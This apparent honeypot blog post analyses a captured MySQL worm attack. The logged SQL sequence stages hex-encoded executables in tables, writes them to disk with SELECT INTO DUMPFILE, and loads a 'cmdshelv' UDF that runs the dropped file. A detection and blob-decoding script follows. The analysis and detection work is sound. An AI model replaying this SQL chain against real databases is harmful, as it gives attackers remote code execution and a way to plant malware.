the mysql cmdshelv

I pushed some final mysql fixes for dionaea yesterday, and just had a look at the ore to see if there was some activity already.
Yes, there was some activity.
Some automaton connected to the database 1) and took some effort to upload 2 files - exactly what I was looking for.

Attack 15134625 at 2011-06-12 11:12:04.471350
	15134625 accept tcp 127.0.0.1:3306 61.129.33.77:4287
		mysqld
			login: 'root':''
			3 'drop function cmdshell'
			3 'drop function my_udfdoor'
			3 'drop function do_system'
			3 'use mysql;'
			3 'drop table if exists tempMix4;'
			3 'create table if not exists tempMix4(data LONGBLOB);'
			3 'set @a = concat('',4D5A90000300000004004D5A...);'
			3 'INSERT INTO tempMix4 VALUES (@a);'
			3 'select data from tempMix4 into DUMPFILE 'C:\\boot1.exe';'
			3 'drop table if exists tempMix4;'
			3 'use mysql;'
			3 'drop table if exists tempMix;'
			3 'create table if not exists tempMix(data LONGBLOB);'
			3 'set @a = concat('',0x4D5A90000300000004000000FFFF...);'
			3 'INSERT INTO tempMix VALUES (@a);'
			3 'select data from tempMix into DUMPFILE 'C:\\WINDOWS\\amd.dll''
			3 'select data from tempMix into DUMPFILE 'C:\\WINT\\amd.dll''
			3 'select data from tempMix into DUMPFILE 'C:\\WINDOWS\\SYSTEM32\\amd.dll''
			3 'select data from tempMix into DUMPFILE 'C:\\WINT\\amd.dll''
			3 'select data from tempMix into DUMPFILE '..\\lib\\plugin\\amd.dll''
			3 'select data from tempMix into DUMPFILE 'C:\\amd.dll''
			3 'select data from tempMix into DUMPFILE '..\\bin\\amd.dll''
			3 'create function cmdshelv returns string soname 'amd.dll';'
			3 'create function cmdshelv returns string soname 'amd.dll''
			3 'create function cmdshelv returns string soname 'C:\\WINDOWS\\system32\\amd.dll''
			3 'create function cmdshelv returns string soname 'C:\\WINNT\\amd.dll''
			3 'create function cmdshelv returns string soname 'C:\\WINDOWS\\SYSTEM32\\amd.dll';'
			3 'create function cmdshelv returns string soname 'C:\\WINNT\\amd.dll';'
			3 'create function cmdshelv returns string soname 'amd.dll''
			3 'select cmdshelv('c:\\boot1.exe')'
			3 'select cmdshelv('c:\\boot1.exe');'
			3 'select cmdshelv('cmd.exe cmd/c del c:\boot1.exe');'
			3 'select cmdshelv('cmd.exe cmd/c del c:\boot1.exe');'
			3 'select cmdshelv('cmd.exe cmd/c del c:\boot1.exe')'
			3 'select cmdshelv('cmd.exe cmd/c del c:\amd.dll')'
			3 'select cmdshelv('cmd.exe cmd/c del C:\WINNT\amd.dll')'
			3 'select cmdshelv('cmd.exe cmd/c del C:\WINDOWS\amd.dll')'
			3 'drop table if exists tempMix;'
			1

The worm creates a table, inserts a blob into it and then dumps the table into a local file with SELECT ... INTO DUMPFILE. This is done twice, once per file: “boot1.exe” via the table “tempMix4”, “amd.dll” via the table “tempMix”. Afterwards the UDF “cmdshelv” is created from the dumped “amd.dll” (CREATE FUNCTION ... SONAME), and that function is used to run the other dumped file, “boot1.exe”.

The files

To retrieve the files from the record page I copied the string, put it in a txt file, and had python convert it - after figuring out the proper end of the string:

>>> a = open('/tmp/boot1.exe.hex')
>>> b = a.read()
>>> b[-10:-1]
"808080);'"
>>> b[-10:-3]
'808080)'
>>> b[-10:-4]
'808080'
>>> c = bytes.fromhex(b[:-4])
>>> d = open('/tmp/boot1.exe','wb+')
>>> d.write(c)
209829
>>> d.close()
>>> 
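As an added example (not code from the original post or from dionaea itself), the script below does two things with a mysqld log in the layout shown above: it walks the COM_QUERY lines and flags the staging-table / hex-blob / DUMPFILE / CREATE FUNCTION ... SONAME chain described earlier, and it recovers the embedded blobs the way the interactive session above did, accepting both the bare and the 0x-prefixed hex form seen in the capture and trimming the trailing ");'" that had to be cut by hand. The sample log lines are constructed from the capture with the hex payloads truncated to a 16-byte MZ header stand-in; the regular expressions are my own assumptions about the log layout, not part of dionaea.

```python
"""Flag the MySQL UDF-dropper chain in a dionaea-style mysqld log and
recover the uploaded hex blobs. Added example with constructed input."""
import re
from dataclasses import dataclass, field

# Constructed sample in dionaea's mysqld log layout ("3" is MySQL's COM_QUERY
# command byte). Hex blobs are truncated; the real capture carried whole PE files.
SAMPLE_LOG = r"""
            login: 'root':''
            3 'use mysql;'
            3 'drop table if exists tempMix4;'
            3 'create table if not exists tempMix4(data LONGBLOB);'
            3 'set @a = concat('',4D5A90000300000004000000FFFF0000);'
            3 'INSERT INTO tempMix4 VALUES (@a);'
            3 'select data from tempMix4 into DUMPFILE 'C:\\boot1.exe';'
            3 'create table if not exists tempMix(data LONGBLOB);'
            3 'set @a = concat('',0x4D5A90000300000004000000FFFF0000);'
            3 'INSERT INTO tempMix VALUES (@a);'
            3 'select data from tempMix into DUMPFILE 'C:\\WINDOWS\\amd.dll''
            3 'create function cmdshelv returns string soname 'amd.dll';'
            3 'select cmdshelv('c:\\boot1.exe')'
"""

# Assumed log layout: COM_QUERY lines look like "<ws>3 '<query>'".
QUERY_LINE = re.compile(r"^\s*3 '(.*)'\s*$")
STAGING = re.compile(r"create table (?:if not exists )?(\w+)\s*\(\s*\w+\s+LONGBLOB", re.I)
HEX_SET = re.compile(r"concat\(''\s*,\s*((?:0x)?[0-9a-f]+)\)", re.I)
DUMPFILE = re.compile(r"into DUMPFILE '(.+?)'", re.I)
UDF_CREATE = re.compile(r"create function (\w+) returns \w+ soname '(.+?)'", re.I)
UDF_CALL = re.compile(r"^\s*select (\w+)\((.*)\)", re.I)
HEX_TRAILER = re.compile(r"[);'\s]+$")   # the ");'" (plus newline) left on a copied string


def decode_hex_blob(text: str) -> bytes:
    """Turn the copied concat('', ...) argument back into bytes.

    Handles both the bare-hex and the 0x-prefixed form and strips the
    trailing ");'" junk; an odd-length string means the cut point is wrong.
    """
    s = HEX_TRAILER.sub("", text.strip())
    if s[:2].lower() == "0x":
        s = s[2:]
    if len(s) % 2:
        raise ValueError("odd-length hex string: wrong cut point")
    return bytes.fromhex(s)


def is_pe(blob: bytes) -> bool:
    """Cheap sanity check: Windows executables start with the 'MZ' magic."""
    return blob[:2] == b"MZ"


@dataclass
class Report:
    tables: list = field(default_factory=list)      # LONGBLOB staging tables
    payloads: list = field(default_factory=list)    # decoded blobs
    dumpfiles: list = field(default_factory=list)   # paths written via DUMPFILE
    udfs: dict = field(default_factory=dict)        # udf name -> soname
    executed: list = field(default_factory=list)    # (udf name, argument)

    @property
    def udf_dropper(self) -> bool:
        """Full chain seen: blob staged, dumped to disk and loaded as a UDF."""
        return bool(self.payloads and self.dumpfiles and self.udfs)


def analyze(log_text: str) -> Report:
    """Walk the COM_QUERY lines and collect each stage of the dropper chain."""
    rep = Report()
    for line in log_text.splitlines():
        m = QUERY_LINE.match(line)
        if not m:
            continue
        q = m.group(1).rstrip(";").strip()
        if (t := STAGING.search(q)):
            rep.tables.append(t.group(1))
        elif (h := HEX_SET.search(q)):
            rep.payloads.append(decode_hex_blob(h.group(1)))
        elif (d := DUMPFILE.search(q)):
            rep.dumpfiles.append(d.group(1))
        elif (u := UDF_CREATE.search(q)):
            rep.udfs[u.group(1)] = u.group(2)
        elif (c := UDF_CALL.match(q)) and c.group(1) in rep.udfs:
            # Only calls to a function the same session created count as execution.
            rep.executed.append((c.group(1), c.group(2).strip("'")))
    return rep


if __name__ == "__main__":
    r = analyze(SAMPLE_LOG)
    print("UDF dropper chain:", r.udf_dropper)
    print("staging tables:", r.tables)
    print("dumped to:", r.dumpfiles)
    print("UDFs:", r.udfs, "executed:", r.executed)
    for i, blob in enumerate(r.payloads):
        print(f"payload {i}: {len(blob)} bytes, PE header: {is_pe(blob)}")
```

The same four stages (LONGBLOB staging table, hex blob assigned to a session variable, SELECT ... INTO DUMPFILE, CREATE FUNCTION ... SONAME) are also what to alert on in the general query log or in a network sensor in front of a real server: a DUMPFILE write followed by CREATE FUNCTION from the same connection is the UDF-dropper pattern regardless of the file or table names the next variant picks.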

boot1.exe

The first file (boot1.exe), md5sum 84a9c9797f5884a94f71641c545169bb, had no hits on google 2), so I uploaded the file to virustotal 3).

amd.dll

The second file (amd.dll) was known to google 4) and I was curious, so I decided to have a quick look - besides querying virustotal 5).

Looking at the exports, there are two exported functions “cmdshelv” and “download”:
[image: amd dll exports]
The strings even provide help on how to call these functions, so I was done with my quick look.
[image: amd dll strings]

cmdshelv

I was curious if “cmdshelv” was a known pattern, so I asked google, and there was even a hit:
[image: google cmdshelv]
The host featured slightly outdated software:

phpmyadmin even warned of the misconfiguration:

The table tempmix4 still existed:

The function “cmdshelv” was listed as udf:

And there were some ideas on how not to design a table:

So I really hope this was a honeypot.

Last but not least, this was not my own deployment but some anonymous contributor using logxmpp to the ore, who did a good job of updating in time - thanks.

2011/06/12/the_mysql_cmdshelv.txt · Last modified: 2011/06/12 13:30 by common